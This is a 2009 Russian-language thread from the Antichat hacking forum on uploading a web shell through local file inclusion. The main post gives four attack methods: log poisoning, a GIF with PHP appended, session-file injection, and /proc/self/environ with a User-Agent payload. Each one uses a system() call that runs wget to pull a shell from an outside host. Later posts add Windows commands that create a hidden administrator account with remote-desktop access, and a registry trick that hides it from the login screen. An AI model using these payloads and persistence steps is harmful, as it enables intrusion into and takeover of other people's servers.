 |
|
16.08.2009, 20:53
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Spyder, я от нечего делать рассписал эти методы залития шелла через LFI.
Скорее всего директива allow_url_include = off. Т.е. проинклюдить удаленно не удастся.
Вариант #0. Можно инклюдить логи, но надо знать путь к ним. Есть специальная тема со списком путей к httpd.conf. Не нашёл пути - пропускай этот пункт. Там есть директива TransferLog, в которой находится абсолютный путь к логам. Открой
Код:
index.php?<?php system('wget http://mysite.ru/shell.txt -O shell.php');?>
После этого в лог-файл запишется PHP код, тебе останется только проинклюдить лог-файл.
Вариант #1. Создай картинку, впиши в конец файла <?php system('wget http://mysite.ru/shell.txt -O shell.php');?>, только не блокнотом, а любым хекс-редактором. Реганись на форуме, залей себе эту картинку в кач-ве аватары, или фотки, etc. Потом инклюдь эту картинку
Код:
http://site.ru/module/index.php?p=../forum/avatars/avatar28082.gif
И открывай файлик shell.
Вариант #2. Допустим, на сайте есть код, вида
PHP код:
session_start();
$_SESSION['id']=$_GET['value'];
Тогда открывай
Код:
file.php?value=<?php system('wget http://mysite.ru/shell.txt -O shell.php');?>
Дальше в куки сайта смотри PHPSESSID и инклюдь Путь к сохраниению сессий может быть иной...
Вариант #3. Еще есть вариант с /proc/self/environ. Если проинклюдив его, ты получаешь что-то вида
Код:
DOCUMENT_ROOT=/var/www GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.site.ru/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?p=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/var/www SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.site.ru SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.site.ru Port 80
Считай, что шелл у тебя есть. Используй любую HTTP-тулзу, н.п. InetCrack и измени отправляемый заголовк User-Agent на <?php system('wget http://mysite.ru/shell.txt -O shell.php');?>.
ЗЫ: system() может не работать, используй exec();
wget может не работать, используй lynx, fetch, curl...
Последний раз редактировалось mailbrush; 16.08.2009 в 20:58..
|
|
|
17.08.2009, 01:14
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от DeluxeS
есть фтп доступ, файлы заливать можно, заливаю php шелл - он его показывает как 404
На сервере файлы с расширением .ASP Какой нужно шелл залить , или что я делаю не так? Ну ты то PHP шелл 
Может там он удаляет PHP файлы все.
ищи шелл на ASP
|
|
|
|
17.08.2009, 01:32
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
С нами:
9129884
Репутация:
240
|
|
DeluxeS загляни сюда http://forum.antichat.ru/thread103576.html
|
|
|
|
17.08.2009, 03:12
|
|
Познающий
Регистрация: 10.03.2009
Сообщений: 54
С нами:
9037788
Репутация:
50
|
|
net user user pass /add
net localgroup Administrators user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited
|
|
|
|
17.08.2009, 06:10
|
|
Познающий
Регистрация: 10.03.2009
Сообщений: 54
С нами:
9037788
Репутация:
50
|
|
А для того, чтобы не запалили, надо сделать в реестре такую фичу:
HKLM/SOFTWARE/Microsoft/Windows NT/Current Version/Winlogon/SpecialAccounts/Userlist/
Создаёшь там параметр с типом REG_DWORD, именем своего юзера и значением 0.
|
|
|
|
17.08.2009, 08:51
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
DeluxeS, рес куда ты хочешь залить свой шелл случайно не едушка?
|
|
|
|
17.08.2009, 11:22
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Задаюсь я этим вопросом уже не впервый раз =\
Я проинклюдил /proc/self/environ, но инклюдящий файл не PHP, a CGI. PHP команды, разумеется, не пашут, так что же можно сделать?
//Как я понял мне нужен аналог system'a на perl'e, но может я не прав.
|
|
|
|
17.08.2009, 11:27
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами:
10158086
Репутация:
1359
|
|
Сообщение от Tigger
Задаюсь я этим вопросом уже не впервый раз =\
Я проинклюдил /proc/self/environ, но инклюдящий файл не PHP, a CGI. PHP команды, разумеется, не пашут, так что же можно сделать?
//Как я понял мне нужен аналог system'a на perl'e, но может я не прав.
все зависит от того на каком языке написана cgi
для перла
Perl's exec(), and system() functions as well as the backtick operator can be used to execute system commands.
так же не факт что они там вообще eval-ятся.
|
|
|
|
17.08.2009, 11:38
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
geezer.code
Но как обрамить код и прочее? Т.е. можешь привести пример (User-Agent: blablabla), а мне сейчас негде проверить, т.к. на этом сайте была просто читалка, но встречал такое очень часто.
|
|
|
|
17.08.2009, 11:55
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами:
10158086
Репутация:
1359
|
|
Сообщение от Tigger
geezer.code
Но как обрамить код и прочее? Т.е. можешь привести пример (User-Agent: blablabla), а мне сейчас негде проверить, т.к. на этом сайте была просто читалка, но встречал такое очень часто.
я не перл-программер.
бегло пробежался по гуглу.
и поспрошал на канале у знатоков.
Перл не страдает таким извращением как пхп, и без "особых условий"
LFI как в пхп, провести нельзя.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
